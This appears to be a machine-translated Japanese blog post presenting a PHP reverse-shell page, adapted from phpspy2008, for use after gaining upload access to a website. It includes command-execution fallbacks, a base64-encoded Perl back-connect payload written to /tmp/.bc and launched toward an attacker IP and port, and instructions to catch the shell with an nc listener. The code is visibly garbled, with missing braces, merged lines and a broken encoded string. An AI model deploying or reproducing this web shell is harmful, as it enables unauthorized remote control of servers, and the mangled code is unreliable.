私はとても無力で、良い解決策も思いつきませんでしたが、あるアイデアを思いつきました。 php ページを置くと、直接シェルに戻ることができます。また、コンソールでの操作は、Web シェルを使用するよりもはるかに便利であり、タイムアウトなどもありません。
私は PHP のことをよく知らないので、残念な Nono と Xiaoyu にコードの修正を依頼しました。リバウンド コードは phpspy2008 から抽出されましたが、直接使用することはできず、別の PHP ファイルに修正する必要があります。アップロード後、ローカルでポートをリッスンし、コードにリバウンド IP とポートを設定して直接アクセスすると、シェルがポップアップします。
免責事項、技術的な内容はありません。主に利便性を目的としています。この方法では、他の面倒な操作を行わずに、毎回この php ページに直接アクセスし、シェルに直接戻ることができます
コードをコピーします コードは次のとおりです:
function which($pr) {
$path =execute("this $pr");
return ($path ? $path : $pr);
functionexecute($cfe) {
$ res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("n",$res); elseif(function_exists('shell_exec ')) {
$res = @shell_exec($cfe)
} elseif(function_exists('system')) {
@ob_start(); = @ob_get_contents();
@ob_end_clean(); elseif(function_exists('passthru')) {
@ob_start(); ();
} elseif (@is_resource($f = @popen($cfe,"r")) {
$res = ''; @feof($f) {
$res .= @fread($f, 1024);
@pclose($f);
}
関数 cf($fname,$text){
if($fp=@fopen( $fname,'w' )) {
@fputs($fp,@base64_decode($text));
@fclose($fp)
}
}
$yourip = "あなたの IP";あなたのポート';
$ Usedb = Array ('Perl' = & GT; 'Perl', 'C' = & GT; 'C'); JHR "。0LCAKAWFKZHIPIHX8IGRPZSGIRXJYB3I6icqhxg4ikt "。
" BTT0NLX1NUUKVBTSWGJHBYB3RVKSB8FCBKAWUOI "。 kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi"
"KTsNCm9wZW4oU1RET1VULCA" iPi
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFulIpOw==";
cf('/tmp/.bc',$back_connect);
$res = detect('perl'); " /tmp/.bc $ yourip $ yourport &");
?>
まずローカルで nc -l -vv -p port を実行してから、この php ページ http://www.site.com/fuck.php にアクセスすると、ローカルでバウンス シェルが取得されます。 。
卑猥な配信専用です 何か良い卑猥な方法がありましたらアドバイスをお願いします。
http://www.bkjia.com/PHPjc/319990.html
www.bkjia.com
true
http://www.bkjia.com/PHPjc/319990.html
技術記事
私はとても無力で、良い解決策も思いつきませんでしたが、あるアイデアを思いつきました。 PHP ページを配置すると、シェルに直接戻ることができます。さらに、コンソールでの操作は WebShell よりもはるかに便利ですが、そうではありません...
。
![[Web フロントエンド] Node.js クイック スタート](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
